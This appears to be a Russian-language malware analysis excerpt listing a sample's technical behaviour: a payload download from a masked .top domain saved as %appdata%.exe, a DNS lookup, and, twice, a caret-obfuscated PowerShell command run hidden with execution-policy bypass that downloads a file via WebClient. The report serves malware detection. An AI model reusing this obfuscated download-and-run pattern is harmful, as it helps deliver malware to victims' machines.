Техническая информация
- http://ho####wergop.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^We^Rs^H^e^LL.e^Xe -^eXEC^ution^po^L^iC^y^ bY^Pa^S^s ^-No^pR^O^fi^le -WiND^OWS^Ty^lE H^ID^D^e^N ^(N^E^w-^O^BJ^Ec^t^ sYS^TE^m.nET^.w^e^BC^L^IE^n^T)^.D^oWnlOaD^F^ilE('http://h...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "po^We^Rs^H^e^LL.e^Xe -^eXEC^ution^po^L^iC^y^ bY^Pa^S^s ^-No^pR^O^fi^le -WiND^OWS^Ty^lE H^ID^D^e^N ^(N^E^w-^O^BJ^Ec^t^ sYS^TE^m.nET^.w^e^BC^L^IE^n^T)^.D^oWnlOaD^F^ilE('http://h...' (со скрытым окном)